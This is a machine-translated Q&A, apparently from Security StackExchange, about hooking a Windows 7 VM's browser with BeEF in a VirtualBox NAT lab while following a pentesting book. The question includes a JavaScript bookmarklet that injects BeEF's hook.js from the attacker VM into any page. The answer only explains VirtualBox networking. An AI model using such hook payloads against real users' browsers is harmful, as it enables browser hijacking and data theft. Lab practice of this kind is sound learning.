如何在VirtualBox NAT网络中在另一个VM浏览器上设置牛肉钩
我在读“实用网络渗透测试”。我使用VirtualBox运行两个VM: Windows 7和Mutillidae以及KaliLinux,在这里我想使用牛肉。两者都连接到Nat网络10.0.2.0/24。
正如书中所述,我通过修改KaliLinux将/etc/network/interfaces设置为具有静态IP:
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
#Static IP Address
auto eth0
iface eth0 inet static
address 10.0.2.99
netmask 255.255.255.0
network 10.0.2.0
broadcast 10.0.2.255
gateway 10.0.2.1我的Windows有IP 10.0.2.4。
我现在正试着装牛肉。当我在每个VM浏览器上向http://10.0.2.99:3000/demos/basic.html打开一个选项卡时,我确实会在牛肉ui面板中将浏览器钩住为在线浏览器。
但我想和Mutillidae搭讪。有一个按钮将其复制为书签,用于为给定的网页追加hook.js文件:javascript: (function () { var url = 'http://10.0.2.99:3000/hook.js';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();
当我在http://10.0.2.4/mutillidae/index.php -上打开的任何一个VM浏览器上运行时,它都不能工作。hook.js文件确实会被加载,我可以在firebug上看到它。但是浏览器从来没有“上瘾”:我在牛肉板上看不到它。
我甚至修改了/etc/beef-xss/config.yaml的这一部分:
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
# set the public hostname and port here
public: "10.0.2.99" # public hostname/IP address
#public_port: "" # experimental做了一些研究但什么都没有..。
一些奇怪的东西(或者说这很正常?):
来自Kali 10.0.2.99
ping 10.0.2.99 - OK
ping 10.0.2.4 - KO --> But I can access 10.0.2.4/mutillidae/ !
ping 10.0.2.1 - OK
ping 10.0.2.0 -b - KO --> shouldn't I get answers from myself and gateway at least?来自W7 10.0.2.4
ping 10.0.2.99 - OK --> So it works in that direction but not in the other? And I can access beef's panel, demo, or hook.js
ping 10.0.2.4 - OK
ping 10.0.2.1 - OK
ping 10.0.2.0 - KO --> Reply from 10.0.2.4: Destination host unreachable. Is this why Kali can't access W7?为什么我不能在Win7 VM上设置一个钩子,连接到与运行牛肉的Kali VM相同的Nat网络上?
谢谢。
如果你需要更多的细节来帮助我,不要犹豫。我会修改我的问题以帮助你帮助我。
回答 1
Security用户
发布于 2018-10-27 06:43:30
我通常在两个虚拟机之间进行黑客测试时,在每个虚拟机上设置两个适配器。第一位是"NAT“。该接口将通过我的主机提供internet访问(但您必须知道,对于每个vm,NAT网络将是不同的网络)。第二个是"NAT网络“,这将是虚拟机共享的网络。
要设置这个辅助网络接口,首先需要在Virtualbox上设置NatNetwork的范围。点击“文件”、“首选项”、“网络”。点击“加号”来创建一个。它将被设置为"NatNetwork“。然后单击齿轮图标来配置它。你可以查看我的截图(抱歉,截图是西班牙语的):
然后配置它,您可以设置任何网络范围。我在这个例子中加上了12.0.0.0/24,以便有一个不冲突的范围。
之后,必须在每个虚拟机上设置辅助网络接口。点击vm,设置,网络和启用二级网络接口选择"Nat网络“和您创建的网络。
如果您在这两台机器上这样做,这些机器将在12.0.0.0/24网络上拥有一个辅助网络接口,并且它们将在该网络上完美地看到另一台机器。他们将得到一个由DHCP的ip,你将能够执行任何黑客测试。
当然,有更多的方法来做这件事,但这是容易和有效的。祝好运。
https://security.stackexchange.com/questions/195593
复制相似问题
腾讯云开发者
